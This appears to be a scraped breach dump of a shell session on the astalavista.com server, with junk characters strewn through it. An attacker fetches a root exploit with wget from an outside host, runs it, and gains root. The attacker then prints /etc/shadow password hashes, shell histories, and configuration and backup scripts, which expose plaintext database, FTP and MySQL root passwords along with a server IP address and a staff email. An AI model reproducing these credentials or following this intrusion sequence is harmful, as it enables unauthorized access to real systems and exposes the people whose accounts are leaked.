brilliant!9 T1 d0 b8 \% q
" i2 ~" C( N( D. j2 V/ q
[~] This been fun but we want more.! |/ t1 N: u- P% }1 O* ]/ N2 b6 B0 R; \
& L, |8 N2 K1 l$ u& W1 H
sh-3.2$ uname -a
3 b+ ?, E& K5 w2 WLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 z' \1 V6 V  `* J, Ash-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]0 o# Y; V- r) `) u
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]
( t! k( f+ n7 u' CResolving anti.sec.labs… 13.33.33.37
/ d9 q0 I/ V( z# s3 w$ [Connecting to anti.sec.labs|13.33.33.37|:80… connected.
! r$ t' t4 L0 X# Y6 L! B% qHTTP request sent, awaiting response… 200 OK/ r! {' j8 Q. ~& Y# i) y
Length: 18200 (18K) [text/plain]
  |! ?" s) g, Z: L. ~) l: aSaving to: `g0troot’$ h, H; a% ]" r! I! c0 W# s
) V: N+ D1 U# _7 v6 d
100%[=========================================================================================================================================>] 18,200      58.6K/s   in
7 Q- J0 J8 B: `! |% U  }% V( ]" Y0.3s
& _0 G9 Q. {7 X2 z1 `6 `4 A; ~* m8 f
& x# O! Q1 m9 i4 b1 H( U7 F& Q18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
0 G+ w3 [6 U# I8 H* c) x7 E( v% N( M7 G6 }1 L, ?  X
sh-3.2$ ./g0troot -i x86_64$ e& {5 L) d$ W
[+] g0troot - anti.sec.labs
; W' l4 X4 Z; {- `$ O4 Y- k- d[+] Target: 2.6.18-128.1.10.el5
. X! N' n! S' i[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
" `0 v5 T& d* n  @4 y: m. I* E# P/ T- U: v( j7 I+ m8 z
[+] r00tr00t
( [. E4 p& j- @2 T. ~) ?; A6 N$ p. ?[~] Executing shell…9 `/ [- J! ^& X: ]2 q1 l
0 {; D* k- N$ i( M9 c
sh-3.2# id
% L( z. g9 r; yuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
" z: G8 k; `) [! b4 g- K- t8 G: Q  d8 z" s% f2 M
sh-3.2# cat /etc/shadow
, l/ J0 a2 u% ]1 yroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
. [2 ~% C/ i6 d# I1 G" g[snip]9 t9 ]! X4 @7 k0 a
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::: ?" \' K7 z. H2 ?; }& J  g
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::. ?, {7 o6 q( K, v) _! l7 {
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::* U- Z7 R- q$ ^* L# ]$ F% Z
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
4 y) |% H1 Q* k& t
% _1 O1 c8 Q/ t+ W7 p4 Ash-3.2# cat /etc/motd2 N9 F! \, ~8 V$ w; ^6 u6 }, o2 \
#####################################################, l& E& G3 m7 A# B1 y+ h4 x
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
1 ?6 @! ~  q( K6 g) u# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
( i! K- R- @) }* f2 ]1 \# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
/ T( |" v% d( N2 K! v4 P#                                                   #; @( _. O+ P! C0 X/ \9 W
#####################################################
+ |+ q! m7 |: D- q6 a#                                                   #/ K1 Q$ r6 c4 X& W9 f
# Admin Contact - 链接标记support@secureservertech.com      #
2 v' j+ t# r1 k$ @#                                                   #/ j4 ~6 y$ @# S2 @* ?) z
# Available ShortCuts                               #* w, @) z2 p  H5 C- b$ V* X0 ?
#                                                   #3 H  Z9 {$ ]+ Z( W+ a& M
# nst -  list active connections                    ## ^- v" `1 k& j
# ddos - shows how many times each ip is connected  #
: [2 ^% B7 b! e# d# {# ltr -  restart the webserver                      #4 n5 D, S8 v9 @
# phpc - edit the php config file                   #
- m# I, q; q4 |2 P+ g8 Q) E# htc -  edit the webserver configuration file      #/ U" H( j/ q+ R2 ~4 ]5 P% Z
# up -   uptime                                     #
  a9 l  o9 ^' S7 o2 c, r# etd - edit the motd of the day file               #
2 m' b4 t1 V2 ]# htr - start and restart apache if needed          #
/ v4 y; L2 O& W# syng - shows active SYN_RECV connections          ## \: L* ~: F& w6 F7 [' a
# synd - syn flood blocker - “synd -h” for usage    #
. S/ F7 A2 Y$ H) |#####################################################
' y: k/ k+ p# j# NOTES:                                            #
1 O/ x( U3 d3 C/ M2 K# Last Upgrade - 12-08-2008 by JF                   #
1 W4 }6 R; t; C# M$ ]" U4 u# My.cnf/Mysql Optimization - 1-28-09               ## @$ n+ P* F' |9 ~
#                                                   #$ G$ h) M* [& [: b! U
#                                                   #5 s; L- t; l) Z5 N' p
#                                                   #3 U5 Z% y9 Y6 i5 ^5 C
#####################################################4 w3 A6 p! b, w0 r4 F, b

6 M+ S7 G1 I8 @9 c6 P& Qsh-3.2# lastlog | grep -v Never/ X3 F6 M1 c; ~4 u6 p3 e
Username         Port     From             Latest3 T. u2 W7 V  Q$ U
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
) e+ a! {" g1 m( n# [9 a6 @admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
# u: }* z# I% h7 }com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
  J% _8 b, ], q0 @) Dastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
& p* a& [, ]7 e0 J0 d% ~
5 y2 N: g3 r5 `% a. Rsh-3.2# ls -la
; |7 }0 B6 O7 d1 ]+ v4 g, J; stotal 453376# R2 F# C- }" p  x
drwxr-x— 15 root root       4096 Jun  4 08:40 ., G4 B7 F7 k, l; w' f/ u' D. P
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
) T' w0 A8 e3 W: t1 M-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip$ P. A8 J; _- o$ L5 H, [
-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg9 z% K  E; p( o! e& ]' a$ l# |3 y. F
-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
1 V. Z/ [* S/ R1 {: v# X' G-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout3 r6 D% U6 d4 P: b8 u4 n
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile+ Y7 o& U5 l5 R2 \" U. Y- y. x# {, d
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
; S# x5 j- y  X+ o-rwx——  1 root root       1899 Oct 28  2007 bk.sh
' J& s% U# [% Q9 a-rw-r–r–  1 root root       1327 Nov 29  2007 cert6 Y: g/ ?/ _$ i
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql4 H- s8 y4 p* `4 {5 W2 d8 ^
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
( c# ]) r# n# |4 C6 v9 v-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc+ ]0 K+ A& E: H" z" b
-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql* }) u8 A& R7 M
drwx——  2 root root       4096 Oct 28  2007 .elinks8 _& `' D  p# h2 K1 O
drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1$ E% S) D7 T* W, d! k
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2" ?- |5 h( f* ]' O  f
-rw——-  1 root root          0 Apr 16 13:19 .history6 Q; [- s  @  x/ Y/ A7 \6 `
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
. |0 O8 p% L8 ~/ J, b9 a& b-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog+ P1 b4 J1 r5 c' r' `' b! t' M
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh8 c5 |# q; O0 b) O# u
-rw——-  1 root root         35 Jun  2 14:23 .lesshst
+ m( }. I5 N, O) ]6 n) A% Y( ldrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp$ E' X( ^& D9 U" E% g- e; Q" e# B
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
% `8 ~/ m9 z4 y-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz2 h7 i: m% j" ?* S
-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2% C0 t$ D8 ]; m0 ^
-rwx——  1 root root        760 Sep 18  2008 lp+ o4 Q) Y% J2 J$ p# N# P
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
4 w7 T, ~# V9 E/ v6 w-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
' O$ C/ k7 b6 C1 F. y-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
' ^% @) x; W( k& f" qdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.93 z( r8 C# }7 @5 r
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
$ N" O7 P2 J4 D- Ddrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
; X  B! F8 _# u/ y0 `' K-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz7 h+ p2 e+ S5 Q# Q
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
' g) B- g+ m' w, J-rw——-  1 root root         41 Oct 19  2007 .my.cnf
& z3 Z0 C. E: B' J$ k: h* h& B-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history
4 x) }( B+ v: g$ f) ?' z! U-rwx——  1 root root      38873 Apr 16  2008 mysqlreport4 R2 K, S4 E4 f5 b9 `% Y: w0 `: _+ ^4 B
-rw——-  1 root root         41 May 20  2008 .mytop4 `% R; N+ I4 f3 w) [
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
  u5 O: r: s* j: T, K- w-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
% A# V7 S8 m4 g, M2 T! ydrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
# A+ o9 |6 e# k% v- K# _-rw——-  1 root root       1462 Sep 21  2007 opt.php
% o2 W- k" j7 F' r' {-rw-r–r–  1 root root       3371 Sep 22  2007 p
8 g& P) c* F& R% V9 n9 e$ D-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz25 _1 B# f8 G, @- ]6 F
-rw——-  1 root root       1024 Feb  3 21:32 .rnd' O- f6 L  T& \3 X$ k9 \
-rw-r–r–  1 root root        716 Nov 28  2007 server.csr  i$ J5 K5 s# T% @& X1 g* n* x$ m2 M0 C
-rw-r–r–  1 root root        887 Nov 28  2007 server.key- N. n6 e3 ^/ i: c' G; q
drwx——  2 root root       4096 Oct 10  2008 .ssh
8 z1 C% e/ X6 {-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
% [" F  Q" z% X-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
* N) {" Y' h; A* c3 c-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
  }1 h  F* s9 U' K. K0 U-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1% g* E  x1 g- w9 n3 ~3 u, w
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp* j: F  g0 ]8 X
-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh9 T2 m% a, k# p* p2 y# P, g% m
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
+ m2 g/ {  w0 j  m: g-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
' E/ Q1 y- ^  A" ~7 |-rw——-  1 root root      12997 May 16  2008 .viminfo8 |( A2 `, S" `9 u1 x: C

: E! x5 h1 F4 {% Jsh-3.2# cat .bash_history& z/ _" k/ ?5 A# V6 l. A
[snip]
$ \. |2 ^- t  ]. J0 f! awget cp4sst.com/sstlinux.tar.gz/ b4 \6 X- U) h3 [) O% r6 g3 d
tar zxvf sstlinux.tar.gz
3 q2 j: t0 B3 z% B* y6 ?5 i) _cd linux-2.6.27.10& D( H; f, `; q/ y; i' f
sh install.sh
* O8 b. a* \' Lmake bzImage ; make modules ; make modules_install ; make install
, Z. [, a# M7 M5 Tmake clean
3 t9 _: \+ H5 s! M8 uservice mysqld restart/ i6 Q0 p$ i3 H6 a
[snip]
1 U5 E+ A+ ~, v2 U( O' {0 Ocd /usr/sbin/  E* ?/ C2 C; t4 h' k* W8 R
chmod 4777 traceroute
8 {. B8 O, e% d' O9 Tchmod 4777 ping
9 `" m1 }2 {4 S4 {# v" Ctraceroute -I 链接标记[url]www.astalavista.ch[/url]
& i3 a% d( M, D3 R8 ]8 U4 t/ _[snip]6 n1 Y% l; ]) s3 }: U
vi /etc/csf/csf.conf' `4 ~( s# e9 Z, `' D5 `8 r7 ~
traceroute google.ch
# ]1 S( M; T( t% kservice csf restart
( }$ ]# F1 g% p) T  c5 Ytracert google.ch. |# C- U7 P/ H0 w# O
service csf restart
  o/ `' ~1 I& s6 w9 Utraceroute 链接标记[url]www.google.ch[/url]
, `4 h+ K7 L; ?& C9 |tracert 链接标记[url]www.google.ch[/url]/ Z9 M% J8 s- i# @" w5 o' D
traceroute 链接标记[url]www.google.ch[/url]( P* _: K8 Z$ r
locate traceroute! x: ~9 F9 a, H8 ^. c4 l
chown 4755 /bin/traceroute* q4 {* W0 J- v% J' i' {
chown 4777 /bin/traceroute5 B& U* R, M' V8 Y; v7 A) \0 m6 }
locate ping
! J4 X5 r  h, ?+ o* |# }/ Rchown 4755 /bin/ping3 g1 X+ z6 L) X% C8 h
chown 4777 /bin/ping
) z9 c( w+ `& Y! z( |cd /bin/, f* \7 e+ H. [* r* e6 H7 I3 D
ls -ali | grep ping& a& M5 p/ k9 z, T) Y9 j
chown root ping" C" N" `1 f! h, l
chmod 4755 ping' R2 G+ _  ]& [) V4 C
ls -ali | grep traceroute' k% `1 G  I- f" K$ b# s8 F
chown root traceroute/ d. M1 l! |* I5 q+ y+ Z5 ?- x
chmod 4755 traceroute
( ?6 I. v# [9 b6 O7 v6 Cls -ali | grep traceroute4 B; M' L/ \& H+ a/ T# V
traceroute -I 链接标记[url]www.google.ch[/url]
1 ^: T- C5 \# d- c: R1 `traceroute 链接标记[url]www.google.ch[/url]
6 m+ v+ w& R3 I9 p+ Lwhois pmsantos.ch
" A, a/ X  D2 T8 a[snip]
2 ]1 q: V  A8 C/ N: L  kmysql -h com_contrexx2_live < /root/defaultp_ports.sql6 z2 E$ O( c8 U  A
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql- i  ?9 G1 U& B/ O5 d4 a0 c- H
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
0 |# L- F7 M. x. Lmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql( T1 h& x+ W. |$ K
top
+ k# u# n! f; ]) Iping ssth.ch
1 Z+ Q4 q, U, }. dping asdlkfaljgasd???ljg???lasj.ch; _! [8 l6 ?  @
ping asdlkfaljgasdlasj.ch+ N  ?9 M+ d9 G4 ~: j
ping 链接标记[url]www.ssth.ch[/url]
/ {$ v- H8 K9 o, J2 rping ssth.ch' F$ q' U" g7 }  K. D! i
nslookup 链接标记[url]www.google.ch[/url]
5 d3 |' U6 P# L. k& U! f' anslookup 链接标记[url]www.ssth.ch[/url]
4 F  W8 |: |* F) p3 i$ {6 J, Kman nslookup
) c* b: B9 Q! }  {6 s2 ~ping 链接标记[url]www.google.ch[/url]  F, x- A. p/ `9 Z3 B- o5 p8 J
nslookup 链接标记[url]www.google.ch[/url]: A4 d! ]% `% y" H, Z* F
nslookup 链接标记[url]www.google.ch[/url]& v% b# n0 F. S. S% T+ [7 X
nslookup salfjasdlf.ch
" A1 }3 Q* V# H( G) e+ W1 ]% y[snip]
1 A5 R. f8 s5 k: g: z1 A* G0 kopenssl passwd -1 sadf
! }  A5 `. N- G8 Q& A1 @openssl passwd -1 5cZNHstdTy- w% t3 g1 S3 ?, t5 K, @* u! |7 q* A
mysql9 U0 M$ ?# {: {. k
mysql2 M/ ~) {3 V3 p* e
locate proftp4 {8 G+ ]5 J2 c. Q* I% m
vi /etc/proftpd.passwd+ U7 W, H3 N; x! b
service proftpd restart
/ `* m* s$ d. c7 r/ C6 I4 X" q2 Wlocate proftpd.conf9 J# c0 C1 P/ y# ^
vi /etc/proftpd.conf# ^9 B2 w0 Q; K, Q  m
vi /etc/proftpd.passwd! Z: G% s2 C/ K9 `
service proftpd restart
) e# T' ^* r; @9 b& I# Q+ i: B[snip]
5 o* y& G) ?' A3 X5 Z# S  t& I/bin/sh /home/com/backup_system/backup.sh
5 ~) q8 T! p5 ]1 K& v0 ztar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin% {) g1 b- v/ c& ^4 w' I! }
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql& Q. Q3 v& }* Y! K5 x. D3 X
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql6 H' t, \, M* o) P4 x
ls -ali
  a6 U( n  M' V$ Z3 G# I* ymysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
. q" H2 I8 z$ A" Ymysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
+ V2 c$ x7 T( f" Zcrontab -l1 @0 D+ x) Y9 Z
crontab -l
9 b1 s/ d! U2 _3 o8 V' D" Fphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
1 ^7 Y7 g) D- B2 f/home/com/public_html/modifications/cronjobs/exploits.sh: [6 I5 I/ k7 ?" ^3 S% U/ C
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]5 O3 }& @) i: |; g
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz$ b2 N/ r5 X% ^* x6 o
cd lsws-4.0.3
0 g* f( X5 B4 O0 v1 |" ]sh install.sh
% E+ m* J" W1 N- @/ m. b3 E" Puptime& D9 D$ u+ M/ w" c3 Q( f
hdparm -tt /dev/sda9 `+ D& Q% E- @8 }7 p6 }1 T$ B
iostat
# G/ ^( G( W& N1 A: Qyum install iostat
" e. ~) I! m4 G  ~iostat. a! o: _. ~7 M0 O0 O7 F2 @
whereis iostat
9 _2 d8 T. x3 g0 n1 vyjm clean all
# X) S- B  M. C$ _1 myum clean all ; yum -y update" g! A4 v) i" P
iostat3 F$ M' n2 h" @7 \' o5 _( R" c9 z  ?
yum install systat, ?* N/ P, v: g3 A% k
rpm -qa | grep iostat4 k2 I7 \6 l5 q; q& Z6 s
rpm -qa | grep sysstat6 T9 e+ B. n8 W, h0 y. G( c0 t
rpm -qa | grep systat
) t2 i4 [- b' @( ~6 z  }3 cdmesg -c2 Z, a: y8 f- \+ j5 v& ]
sysctl -p2 O1 |" M* n, o: D% g/ c  ]
uname -r/ F3 d8 `* g, u3 x& [) r
cd /usr/src
( x7 C0 k. @- T( K6 cwget nix101.com/kernels/sstlinux.tar.gz# o: n. W7 B- Y# s1 w1 R
shutdown -r now
# n# R0 d( o' j2 q3 z5 lnano -w /boot/grub/grub.conf
3 m. t1 h6 ]. O! @) u3 ^: c- k7 _/ a: k; V/ d2 L- @% i0 E
sh-3.2# cat .my.cnf' @* x/ r5 d2 J6 z" }$ l9 @( j
[client]1 v, N5 P9 S. W: l, w
user=da_admin; S3 \8 `5 p/ _
password=X9dctmRH
1 [; @, r6 j: o# e( Z1 l; [! `6 n. E0 }9 Y2 f
sh-3.2# cat /home/com/backup_system/backup.sh$ {( G2 K0 i& ^9 S% Y4 \- o
#!/bin/sh" k0 _' h" t; W" b
#####################################################################
! f4 Z2 `/ B  o#                                                                   #
) K; x( K3 `$ a0 H6 X* X* y#   incremental backup for astalavista.com                          #
3 n9 O" c$ |% Y# G#                                                                   #
2 m9 ?7 z) g9 n1 H2 Y#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
9 M! w% J+ R: Y7 d: }8 w' R#                                                                   #  _; r: R0 [) _1 B- s1 N4 G8 n3 S- F/ K" J
#####################################################################
  Z! R, K' @9 ]6 V[snip]  \* \8 P6 {2 c$ O) R0 L
PROG_DIR=”/home/com/backup_system”;
9 ^% l; w: }$ t9 Q  D/ S3 K/ b+ c0 i) DBACKUP_DIR=”/home/com/backups”;# D7 X6 F, ]6 t2 x* O
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
) r. H1 A4 H$ e# T  w( C# ftp for synology backup server% [3 X6 [8 h( [/ V7 N" F
FTP_HOST=”212.254.194.163″;
' A" ]0 u: n! Z' C: ~; E6 ?FTP_PORT=”21″;' i( i. U7 q' z* ~* u& M7 A( {
FTP_USER=”astalavista.com”;
3 g. N& T1 ^  Z+ S7 v* S: p3 ~FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
" r9 z( Y' b3 i& D" [" T$ B4 XFTP_DIR=”/astalavista.com”;7 d) R" L5 s/ f! |
# database) [1 _% R4 O8 g  M1 ~! t; d
DB_HOST=”localhost”;1 p, u2 b- |! D# ]3 B( _" N7 _7 T
DB_USER=”contrexxuser2″;
3 m+ ?0 a0 j; c" ?# J0 D1 {. n  RDB_PASS=”0fEYNZgXz1pKe”;
/ Y. X% F4 d: A& Q  U2 YDB_DATABASE1=”com_contrexx2_live”;
) t- p; h& {/ A! ^  s5 {7 q! T; TDB_DATABASE2=”com_contrexx2″;
3 L1 r- d/ V6 d[snip]# C: a  J; d" A1 x. u0 @# v; G
ftp -in $FTP_HOST $FTP_PORT <<EOF
6 F7 h" @, m8 z7 e# s1 N. T: q7 _quote USER $FTP_USER! S: E8 Z% b( a! T, W1 _$ ?/ f
quote PASS $FTP_PASS( N: o% N3 h( q0 f/ H
cd $FTP_DIR' z9 x! e+ \3 |* B2 Q
put $DB_FULLNAME-SQL_Dump.tar
% Q" q1 U" f& u5 O/ u. f- }# lput $BACKUP_FULLNAME-Public_HTML.tar/ h6 O3 K: y7 i: v1 I
close8 s5 h9 \; x: n$ J
bye
1 ?% m6 X: O, Z: t/ `6 K; C9 CEOF4 J% Q9 [* K! w

& [4 [+ H- f  `" b6 Z$ g, f- lsh-3.2# cd /home/ a0 B/ W; l1 |/ L! \" L- F
sh-3.2# ls -la
& k8 A1 G  ]/ L4 X! ytotal 120
' a* G1 N! `2 Z2 s* d  [drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .7 }0 O) b+ E- S+ Z4 J" Z  P
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..1 ~) F) C7 \" b2 M
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin+ C3 `; E# l0 i0 @* _8 L! K& P
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group* Q4 z- _- d% c5 N" D* }
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
: s( H+ ?+ P& Z$ \3 Y# C6 Cdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
( ^. d  h/ ~; ?drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup7 S% d8 P: a/ z* d$ r% |6 }
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161/ z$ U  u* u! t/ Y' a
drwx–x–x 10 com     com      4096 Apr 28 12:40 com' S, i" \3 V- f% P" P
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
! R6 L' N$ i; H4 G) j$ h2 Ydrwx——  3 jon     jon      4096 Sep 21  2007 jon
# N1 v; D2 z3 F, adrwx——  2 root    root    16384 Sep 11  2007 lost+found
% n, e3 \$ g; ~; L# Edrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
; G' U1 b2 x2 \8 Z4 {8 H4 {drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata* R# }6 V7 Q0 Y" y
drwx——  2 jon     jon      4096 Sep 15  2007 test
# C6 P$ m; B! udrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
7 q5 R$ w6 C  i7 g4 @$ I7 s' G+ r9 g9 N& n" \- T& P$ [; o) [* R# ~3 E
sh-3.2# cd admin* K5 u9 d, H& A
sh-3.2# ls -la
6 I' Q1 J: q0 v& w/ Vtotal 1735896& y5 i( ^4 M* S. }1 M# }7 u8 W
drwx–x–x  9 admin admin       4096 Nov 28  2007 .2 |: O/ w7 b$ i: n% u: L) H
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..% M. g# @8 C% n% l- w  y
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
, S! }4 I; A1 j" x7 x. R& ]" bdrwx——  2 admin admin       4096 Sep 28  2007 backups4 x7 v, z1 t  p9 ^
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history8 g4 ?- u0 r  H+ ^
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout$ v+ |( R4 q( O, k. y
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
7 r7 f/ a( B# j) h" p; @! U4 t-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc: N) T. |8 U) A6 m1 C/ l
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups  Y  i; `7 }. U% r, C
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains8 n; z) W) G: n  i3 J
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap
& e% F6 |2 b* t' k-rw-r–r–  1 root  root          24 Sep 21  2007 info.php  V6 f; I# d2 i% {
drwx——  2 admin admin       4096 Sep 21  2007 mail
* ~# J0 r" Q0 o- H. y' r3 E-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr4 b- O3 @8 `! D5 g# e, {
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key: K' {0 x3 y& p
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
9 o- j+ B3 T1 l* L1 J-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz# U( e( ^) C5 r. r" Z# v
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups- m/ X# @0 `6 j% U

1 O) R& ^% B* n$ f6 c! Y& Hsh-3.2# ..
2 R# D5 Z5 ?6 [5 J. D( K  Ssh-3.2# cd jon
' `% Y8 r* t( e$ m9 f$ q! bsh-3.2# ls -la5 V2 l% ]1 r/ m% T* h" B3 k
total 36
- I" _1 a" Y" r3 ~$ Odrwx——  3 jon  jon  4096 Sep 21  2007 .+ @( s0 u" |3 r  L' U0 Q8 \% m, _3 x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 l- ~  P6 x# k$ i$ D3 u- W  r-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history3 S, U2 B+ i1 B6 Z
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout5 M# t  f+ X4 U, ]" h7 |
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile' H3 H  h. F; L
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
, ]$ L' K$ L+ ]* V) m-rw-r–r–  1 root root   24 Sep 21  2007 info.php
( I; B" A7 a- N: g& d# v0 u0 zdrwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
7 d  ]% G- h: @+ A; j  ]5 j# F: B
0 h; T1 M; J. v3 Msh-3.2# cd ..' \& ?5 e+ k5 M( g; g
sh-3.2# cd test, Y9 T( v0 J" g* X0 i
sh-3.2# ls -la+ W1 ?1 N: u8 N, s  h2 w- B* A0 }
total 48
, e  o! V  K% F! Vdrwx——  2 jon  jon  4096 Sep 15  2007 .6 {! ~3 ~/ D  o- W2 h
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ X! e8 y; p0 O$ e-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history& E* z" N5 B5 P
-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout* W" M  x9 p2 j6 m$ A+ }
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile& I3 A8 y( W* q
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc1 W2 y) a- C. r/ V4 q# h+ N9 ?2 W
sh-3.2# cat .bash_history
1 U6 s% ^7 a: A1 w, d5 [/usr/bin/mysqladmin -u root password PoliuJhytg67
+ z8 @5 L, E6 x+ }+ o  {. t! S; ?1 x/ d# @
sh-3.2# cd ..! }. W, L# l( i3 i% q2 X
sh-3.2# cd astanet" U; y0 ^1 }# s
sh-3.2# ls -la; F% n1 ?( F* ], T0 h3 c& [! W
total 52
2 S- k- u& L+ ^) j" `" Fdrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .  y' ]) Y/ R- V, t8 n- y" Y
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..6 C4 y' `) @* }$ A7 C+ n
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
5 w, |* k9 m4 t) Z' W8 P& U-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
